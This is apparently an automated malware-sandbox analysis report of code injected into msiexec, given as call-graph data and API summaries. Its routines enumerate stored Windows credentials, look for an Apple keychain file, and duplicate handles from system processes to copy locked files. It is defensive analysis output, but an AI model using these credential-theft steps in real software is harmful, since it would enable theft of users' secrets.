38983 40add4 2 API calls 38983->38985 38990 40e5ed memset memset 38984->38990 38985->38980 38985->38981 38985->38983 38986 40c231 _wcsicmp 38985->38986 38987 40c1d3 34 API calls 38985->38987 38986->38985 38988 40c248 38986->38988 38987->38985 39003 40c084 21 API calls 38988->39003 38991 414c2e 14 API calls 38990->38991 38992 40e63f 38991->38992 38993 409d1f 6 API calls 38992->38993 
38994 40e658 38993->38994 39004 409b98 GetFileAttributesW 38994->39004 38996 40e667 38997 409d1f 6 API calls 38996->38997 38999 40e680 38996->38999 38997->38999 39005 409b98 GetFileAttributesW 38999->39005 39000 40e68f 39001 40c2d8 39000->39001 39006 40e4b2 39000->39006 39001->38929 39001->38930 39003->38985 39004->38996 39005->39000 39027 40e01e 39006->39027 39008 40e593 39009 40e5b0 39008->39009 39010 40e59c DeleteFileW 39008->39010 39011 40b04b ??3@YAXPAX 39009->39011 39010->39009 39013 40e5bb 39011->39013 39012 40e521 39012->39008 39050 40e175 39012->39050 39015 40e5c4 CloseHandle 39013->39015 39016 40e5cc 39013->39016 39015->39016 39018 40b633 free 39016->39018 39017 40e573 39020 40e584 39017->39020 39021 40e57c CloseHandle 39017->39021 39019 40e5db 39018->39019 39023 40b633 free 39019->39023 39093 40b1ab free free 39020->39093 39021->39020 39022 40e540 39022->39017 39070 40e2ab 39022->39070 39025 40e5e3 39023->39025 39025->39001 39028 406214 22 API calls 39027->39028 39029 40e03c 39028->39029 39030 40e16b 39029->39030 39031 40dd85 74 API calls 39029->39031 39030->39012 39032 40e06b 39031->39032 39032->39030 39033 40afcf ??2@YAPAXI ??3@YAXPAX 39032->39033 39034 40e08d OpenProcess 39033->39034 39035 40e0a4 GetCurrentProcess DuplicateHandle 39034->39035 39039 40e152 39034->39039 39036 40e0d0 GetFileSize 39035->39036 39037 40e14a CloseHandle 39035->39037 39040 409a45 GetTempPathW GetWindowsDirectoryW GetTempFileNameW 39036->39040 39037->39039 39038 40e160 39042 40b04b ??3@YAXPAX 39038->39042 39039->39038 39041 406214 22 API calls 39039->39041 39043 40e0ea 39040->39043 39041->39038 39042->39030 39044 4096dc CreateFileW 39043->39044 39045 40e0f1 CreateFileMappingW 39044->39045 39046 40e140 CloseHandle CloseHandle 39045->39046 39047 40e10b MapViewOfFile 39045->39047 39046->39037 39048 40e13b CloseHandle 39047->39048 39049 40e11f WriteFile UnmapViewOfFile 39047->39049 39048->39046 39049->39048 39051 40e18c 39050->39051 39052 406b90 11 API calls 39051->39052 39053 
40e19f 39052->39053 39054 40e1a7 memset 39053->39054 39055 40e299 39053->39055 39060 40e1e8 39054->39060 39056 4069a3 ??3@YAXPAX free 39055->39056 39057 40e2a4 39056->39057 39057->39022 39058 406e8f 13 API calls 39058->39060 39059 406b53 SetFilePointerEx ReadFile 39059->39060 39060->39058 39060->39059 39061 40dd50 _wcsicmp 39060->39061 39062 40e283 39060->39062 39066 40742e 8 API calls 39060->39066 39067 40aae3 wcslen wcslen _memicmp 39060->39067 39068 40e244 _snwprintf 39060->39068 39061->39060 39063 40e291 39062->39063 39064 40e288 free 39062->39064 39065 40aa04 free 39063->39065 39064->39063 39065->39055 39066->39060 39067->39060 39069 40a8d0 7 API calls 39068->39069 39069->39060 39071 40e2c2 39070->39071 39072 406b90 11 API calls 39071->39072 39083 40e2d3 39072->39083 39073 40e4a0 39074 4069a3 ??3@YAXPAX free 39073->39074 39076 40e4ab 39074->39076 39075 406e8f 13 API calls 39075->39083 39076->39022 39077 406b53 SetFilePointerEx ReadFile 39077->39083 39078 40e489 39079 40aa04 free 39078->39079 39080 40e491 39079->39080 39080->39073 39082 40e497 free 39080->39082 39081 40dd50 _wcsicmp 39081->39083 39082->39073 39083->39073 39083->39075 39083->39077 39083->39078 39083->39081 39084 40dd50 _wcsicmp 39083->39084 39087 40742e 8 API calls 39083->39087 39088 40e3e0 memcpy 39083->39088 39089 40e3fb memcpy 39083->39089 39090 40e3b3 wcschr 39083->39090 39091 40e416 memcpy 39083->39091 39092 40e431 memcpy 39083->39092 39085 40e376 memset 39084->39085 39086 40aa29 6 API calls 39085->39086 39086->39083 39087->39083 39088->39083 39089->39083 39090->39083 39091->39083 39092->39083 39093->39008 39095 40a980 39094->39095 39096 40a995 _wcsicmp 39095->39096 39097 40a99c wcscmp 39095->39097 39098 40a8bb 39095->39098 39096->39095 39097->39095 39098->38949 39098->38950 39099->38953 39101 40aa23 RegEnumValueW 39100->39101 39101->38962 39101->38963 39103 405335 39102->39103 39104 40522a 39102->39104 39103->38547 39105 40b2cc 27 API calls 39104->39105 39106 405234 39105->39106 39107 
40a804 8 API calls 39106->39107 39108 40523a 39107->39108 39147 40b273 39108->39147 39110 405248 _mbscpy _mbscat GetProcAddress 39111 40b273 27 API calls 39110->39111 39112 405279 39111->39112 39150 405211 GetProcAddress 39112->39150 39114 405282 39115 40b273 27 API calls 39114->39115 39116 40528f 39115->39116 39151 405211 GetProcAddress 39116->39151 39118 405298 39119 40b273 27 API calls 39118->39119 39120 4052a5 39119->39120 39152 405211 GetProcAddress 39120->39152 39122 4052ae 39123 40b273 27 API calls 39122->39123 39124 4052bb 39123->39124 39153 405211 GetProcAddress 39124->39153 39126 4052c4 39127 40b273 27 API calls 39126->39127 39128 4052d1 39127->39128 39154 405211 GetProcAddress 39128->39154 39130 4052da 39131 40b273 27 API calls 39130->39131 39132 4052e7 39131->39132 39155 405211 GetProcAddress 39132->39155 39134 4052f0 39135 40b273 27 API calls 39134->39135 39136 4052fd 39135->39136 39156 405211 GetProcAddress 39136->39156 39138 405306 39139 40b273 27 API calls 39138->39139 39140 405313 39139->39140 39157 405211 GetProcAddress 39140->39157 39142 40531c 39143 40b273 27 API calls 39142->39143 39144 405329 39143->39144 39158 405211 GetProcAddress 39144->39158 39146 405332 39146->39103 39148 40b58d 27 API calls 39147->39148 39149 40b18c 39148->39149 39149->39110 39150->39114 39151->39118 39152->39122 39153->39126 39154->39130 39155->39134 39156->39138 39157->39142 39158->39146 39160 40440c FreeLibrary 39159->39160 39161 40436d 39160->39161 39162 40a804 8 API calls 39161->39162 39163 404377 39162->39163 39164 404383 39163->39164 39165 404405 39163->39165 39166 40b273 27 API calls 39164->39166 39165->38559 39165->38561 39165->38562 39167 40438d GetProcAddress 39166->39167 39168 40b273 27 API calls 39167->39168 39169 4043a7 GetProcAddress 39168->39169 39170 40b273 27 API calls 39169->39170 39171 4043ba GetProcAddress 39170->39171 39172 40b273 27 API calls 39171->39172 39173 4043ce GetProcAddress 39172->39173 39174 40b273 27 API calls 39173->39174 39175 4043e2 
GetProcAddress 39174->39175 39176 4043f1 39175->39176 39177 4043f7 39176->39177 39178 40440c FreeLibrary 39176->39178 39177->39165 39178->39165 39180 404413 FreeLibrary 39179->39180 39181 40441e 39179->39181 39180->39181 39181->38576 39182->38572 39184 40447e 39183->39184 39185 40442e 39183->39185 39184->38572 39186 40b2cc 27 API calls 39185->39186 39187 404438 39186->39187 39188 40a804 8 API calls 39187->39188 39189 40443e 39188->39189 39190 404445 39189->39190 39191 404467 39189->39191 39192 40b273 27 API calls 39190->39192 39191->39184 39194 404475 FreeLibrary 39191->39194 39193 40444f GetProcAddress 39192->39193 39193->39191 39195 404460 39193->39195 39194->39184 39195->39191 39197 4135f6 39196->39197 39198 4135eb FreeLibrary 39196->39198 39197->38579 39198->39197 39200 4449c4 39199->39200 39201 444a52 39199->39201 39202 40b2cc 27 API calls 39200->39202 39201->38596 39201->38597 39203 4449cb 39202->39203 39204 40a804 8 API calls 39203->39204 39205 4449d1 39204->39205 39206 40b273 27 API calls 39205->39206 39207 4449dc GetProcAddress 39206->39207 39208 40b273 27 API calls 39207->39208 39209 4449f3 GetProcAddress 39208->39209 39210 40b273 27 API calls 39209->39210 39211 444a04 GetProcAddress 39210->39211 39212 40b273 27 API calls 39211->39212 39213 444a15 GetProcAddress 39212->39213 39214 40b273 27 API calls 39213->39214 39215 444a26 GetProcAddress 39214->39215 39216 40b273 27 API calls 39215->39216 39217 444a37 GetProcAddress 39216->39217 39218 40b273 27 API calls 39217->39218 39219 444a48 GetProcAddress 39218->39219 39219->39201 39220->38607 39221->38607 39222->38607 39223->38607 39224->38598 39226 403a29 39225->39226 39240 403bed memset memset 39226->39240 39228 403ae7 39253 40b1ab free free 39228->39253 39229 403a3f memset 39233 403a2f 39229->39233 39231 403aef 39231->38614 39232 409d1f 6 API calls 39232->39233 39233->39228 39233->39229 39233->39232 39234 409b98 GetFileAttributesW 39233->39234 39235 40a8d0 7 API calls 39233->39235 39234->39233 39235->39233 
39237 40a051 GetFileTime CloseHandle 39236->39237 39238 4039ca CompareFileTime 39236->39238 39237->39238 39238->38614 39239->38615 39241 414c2e 14 API calls 39240->39241 39242 403c38 39241->39242 39243 409719 2 API calls 39242->39243 39244 403c3f wcscat 39243->39244 39245 414c2e 14 API calls 39244->39245 39246 403c61 39245->39246 39247 409719 2 API calls 39246->39247 39248 403c68 wcscat 39247->39248 39254 403af5 39248->39254 39251 403af5 20 API calls 39252 403c95 39251->39252 39252->39233 39253->39231 39255 403b02 39254->39255 39256 40ae18 9 API calls 39255->39256 39265 403b37 39256->39265 39257 403bdb 39259 40aebe FindClose 39257->39259 39258 40add4 wcscmp wcscmp 39258->39265 39260 403be6 39259->39260 39260->39251 39261 40a8d0 7 API calls 39261->39265 39262 40ae18 9 API calls 39262->39265 39263 40ae51 9 API calls 39263->39265 39264 40aebe FindClose 39264->39265 39265->39257 39265->39258 39265->39261 39265->39262 39265->39263 39265->39264 39267 409d1f 6 API calls 39266->39267 39268 404190 39267->39268 39281 409b98 GetFileAttributesW 39268->39281 39270 40419c 39271 4041a7 6 API calls 39270->39271 39272 40435c 39270->39272 39273 40424f 39271->39273 39272->38636 39273->39272 39275 40425e memset 39273->39275 39277 409d1f 6 API calls 39273->39277 39278 40a8ab 9 API calls 39273->39278 39282 414842 39273->39282 39275->39273 39276 404296 wcscpy 39275->39276 39276->39273 39277->39273 39279 4042b6 memset memset _snwprintf wcscpy 39278->39279 39279->39273 39280->38640 39281->39270 39285 41443e 39282->39285 39284 414866 39284->39273 39286 41444b 39285->39286 39287 414451 39286->39287 39288 4144a3 GetPrivateProfileStringW 39286->39288 39289 414491 39287->39289 39290 414455 wcschr 39287->39290 39288->39284 39292 414495 WritePrivateProfileStringW 39289->39292 39290->39289 39291 414463 _snwprintf 39290->39291 39291->39292 39292->39284 39293->38645 39295 40b2cc 27 API calls 39294->39295 39296 409615 39295->39296 39297 409d1f 6 API calls 39296->39297 39298 409625 39297->39298 39323 
[Execution graph data: serialized node/edge list for the interactive graph viewer (each node is "<node id> <address> [API names]", each edge "<id>-><id>"). The list starts mid-graph, so nodes numbered below 39298 are not on this page. Beyond the pervasive memset/memcpy/memcmp buffer handling, the named call sites it records are:
• Dynamic import resolution: 413cb0 GetModuleHandleW → 413cbf GetProcAddress; 413f5f five consecutive GetProcAddress calls, after which 413f37 calls K32GetModuleFileNameExW; 44deb5 FreeLibrary.
• Process and system queries: 413ce3 GetProcessTimes; 409cf9 GetVersionExW.
• Path handling: 409b98 GetFileAttributesW; 409dd5 GetWindowsDirectoryW + wcscpy; 409a66 GetWindowsDirectoryW → 409a74 GetTempFileNameW; 41396c wcschr; 4097f7 wcslen/wcslen/_memicmp; wcscpy/wcscat at 4139c9, 413a11 and 413a31.
• File I/O: 4096c3 CreateFileW → 40cc3d GetFileSize → 40a2ef ReadFile → 40ab4a MultiByteToWideChar → 40cc95 CloseHandle (the read-whole-file helper at 40cc26); 40b7d4 memset + CreateFileW; 417570 SetFilePointer and 41760a ReadFile with GetLastError checks at 41759c, 4175a8 and 417627; 4175d6 CloseHandle retried after 4175ce Sleep; 417bf6 UnmapViewOfFile + CloseHandle.
• PE resources: 4148b6 FindResourceW → 4148cf SizeofResource → 4148e0 LoadResource → 4148ee LockResource; 41493c EnumResourceNamesW.
• INI settings: 41457f GetPrivateProfileIntW; 4143f1 memset, _itow, WritePrivateProfileStringW.
• String conversion and comparison: 40a6e6 and 40bc61 WideCharToMultiByte; 40ab7c MultiByteToWideChar; 40ccf0 _wcsicmp; 40103c strlen; 40abb7 wcslen/memmove; 40aa71 wcslen; 40bd3a LocalFree.
• Heap helpers: malloc/memcpy/free wrappers at 40a9ce and 40d00b; free at 40b633, 40b1ab, 40aa04 and 415304; 40b04b ??3@YAXPAX (operator delete); 415d23 __aullrem/__aulldvrm.]

                                                                    Control-flow Graph

                                                                    Basic blocks of sub_40DD85 (0x40dd85-0x40e01b) with the calls in each, in the order the graph data gives them:
                                                                    • 40dd85-40ddeb: memset, call 409bca, CreateFileW
                                                                    • 40ddf1-40de09: call 40afcf, call 41352f
                                                                    • 40de0b-40de1a: NtQuerySystemInformation (40de29-40de39 branches back to 40ddf1)
                                                                    • 40de3b-40de52: CloseHandle, GetCurrentProcessId
                                                                    • 40de7a-40de8e: call 413cfa, call 413d4c
                                                                    • 40de94-40debb: call 40e6ad, call 409c52, _wcsicmp
                                                                    • 40debd-40dece: _wcsicmp
                                                                    • 40ded0-40dee1: _wcsicmp
                                                                    • 40dee7-40def7: OpenProcess
                                                                    • 40df23-40df4a: GetCurrentProcess, DuplicateHandle
                                                                    • 40df4c-40df76: memset, call 41352f
                                                                    • 40df8f-40dfbb: CloseHandle, call 409c52 (twice), _wcsicmp
                                                                    • 40dfef-40dff2: CloseHandle
                                                                    • 40e00c-40e01b: call 413d29
                                                                    APIs
                                                                    • memset.MSVCRT ref: 0040DDAD
                                                                      • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                    • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                      • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                      • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                                    • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                    • CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                    • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                    • _wcsicmp.MSVCRT ref: 0040DEB2
                                                                    • _wcsicmp.MSVCRT ref: 0040DEC5
                                                                    • _wcsicmp.MSVCRT ref: 0040DED8
                                                                    • OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
                                                                    • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
                                                                    • DuplicateHandle.KERNELBASE(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
                                                                    • memset.MSVCRT ref: 0040DF5F
                                                                    • CloseHandle.KERNEL32(C0000004,?,?,?,?,000000FF,00000000,00000104), ref: 0040DF92
                                                                    • _wcsicmp.MSVCRT ref: 0040DFB2
                                                                    • CloseHandle.KERNEL32(00000104,?,000000FF,00000000,00000104), ref: 0040DFF2
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: AddressProc$Handle$_wcsicmp$CloseProcess$CurrentFileModulememset$??2@CreateDuplicateInformationNameOpenQuerySystem
                                                                    • String ID: dllhost.exe$taskhost.exe$taskhostex.exe
                                                                    • API String ID: 708747863-3398334509
                                                                    • Opcode ID: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                                    • Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
                                                                    • Opcode Fuzzy Hash: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                                    • Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58

                                                                    Control-flow Graph: function 413d4c-413f24 (CreateToolhelp32Snapshot, Process32FirstW/Process32NextW loop, OpenProcess, GetModuleHandleW, GetProcAddress, CloseHandle, free); rendered graph, executed/not-executed legend and block-edge data not reproduced here.

                                                                    APIs
                                                                      • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,?), ref: 00413D6A
                                                                    • memset.MSVCRT ref: 00413D7F
                                                                    • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                                                                    • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                                                                    • memset.MSVCRT ref: 00413E07
                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                                                                    • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00413E56
                                                                    • CloseHandle.KERNEL32(?,?,?,?,00000000,?), ref: 00413EA8
                                                                    • free.MSVCRT ref: 00413EC1
                                                                    • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                                                                    • CloseHandle.KERNEL32(00000000,00000000,0000022C), ref: 00413F1A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: Handle$CloseProcess32freememset$AddressCreateFirstModuleNextOpenProcProcessSnapshotToolhelp32
                                                                    • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                                    • API String ID: 1344430650-1740548384
                                                                    • Opcode ID: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                                                                    • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                                                                    • Opcode Fuzzy Hash: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                                                                    • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9
                                                                    APIs
                                                                    • FindResourceW.KERNELBASE(?,?,?), ref: 004148C3
                                                                    • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                                                                    • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                                                                    • LockResource.KERNEL32(00000000), ref: 004148EF
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: Resource$FindLoadLockSizeof
                                                                    • String ID:
                                                                    • API String ID: 3473537107-0
                                                                    • Opcode ID: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                    • Instruction ID: 8a72e2f5d7590eb6bb033c3ed88c96ec9d5eb8bcd973c23d1c6560583cb0a60d
                                                                    • Opcode Fuzzy Hash: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                    • Instruction Fuzzy Hash: 0101D2727402156B8B294FB6DD4999BBFAEFFC6391308803AF809D6331DA31C851C688
                                                                    APIs
                                                                      • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                      • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                                                                      • Part of subcall function 00418680: free.MSVCRT ref: 004186C7
                                                                      • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                    • GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                                                                    • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                                                                    • free.MSVCRT ref: 00418803
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: DiskFreeSpacefree$FullNamePathVersionmalloc
                                                                    • String ID:
                                                                    • API String ID: 1355100292-0
                                                                    • Opcode ID: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                                    • Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
                                                                    • Opcode Fuzzy Hash: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                                    • Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
                                                                    APIs
                                                                    • FindFirstFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                                                                    • FindNextFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: FileFind$FirstNext
                                                                    • String ID:
                                                                    • API String ID: 1690352074-0
                                                                    • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                    • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
                                                                    • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                    • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                                                                    APIs
                                                                    • memset.MSVCRT ref: 0041898C
                                                                    • GetSystemInfo.KERNELBASE(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: InfoSystemmemset
                                                                    • String ID:
                                                                    • API String ID: 3558857096-0
                                                                    • Opcode ID: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                                    • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                                                                    • Opcode Fuzzy Hash: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                                    • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE

                                                                    Control-flow Graph: function 44553b-445fb2 (memset, wcsrchr, _wcsicmp and numerous internal subcalls); rendered graph, executed/not-executed legend and block-edge data not reproduced here.

                                                                    APIs
                                                                    • memset.MSVCRT ref: 004455C2
                                                                    • wcsrchr.MSVCRT ref: 004455DA
                                                                    • memset.MSVCRT ref: 0044570D
                                                                    • memset.MSVCRT ref: 00445725
                                                                      • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                                                                      • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                                                                      • Part of subcall function 0040BDB0: CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                      • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                                                                      • Part of subcall function 0040BDB0: wcsncmp.MSVCRT ref: 0040BE38
                                                                      • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                                                                      • Part of subcall function 0040BDB0: memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                      • Part of subcall function 004135F7: GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                    • memset.MSVCRT ref: 0044573D
                                                                    • memset.MSVCRT ref: 00445755
                                                                    • memset.MSVCRT ref: 004458CB
                                                                    • memset.MSVCRT ref: 004458E3
                                                                    • memset.MSVCRT ref: 0044596E
                                                                    • memset.MSVCRT ref: 00445A10
                                                                    • memset.MSVCRT ref: 00445A28
                                                                    • memset.MSVCRT ref: 00445AC6
                                                                      • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                      • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                                                      • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                                                                      • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                      • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                    • memset.MSVCRT ref: 00445B52
                                                                    • memset.MSVCRT ref: 00445B6A
                                                                    • memset.MSVCRT ref: 00445C9B
                                                                    • memset.MSVCRT ref: 00445CB3
                                                                    • _wcsicmp.MSVCRT ref: 00445D56
                                                                    • memset.MSVCRT ref: 00445B82
                                                                      • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                      • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                      • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                      • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                      • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                      • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                                                                      • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                                                                    • memset.MSVCRT ref: 00445986
                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AddressAttributesCloseCreateCredEnumerateHandleProcSize_wcsicmp_wcslwrmemcpywcscatwcscpywcsncmp
                                                                    • String ID: *.*$Apple Computer\Preferences\keychain.plist
                                                                    • API String ID: 2263259095-3798722523
                                                                    • Opcode ID: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                                                    • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                                                                    • Opcode Fuzzy Hash: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                                                    • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A

                                                                    Control-flow Graph: graph data not present in this extraction.

                                                                    APIs
                                                                      • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                      • Part of subcall function 004044A4: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                      • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                                      • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
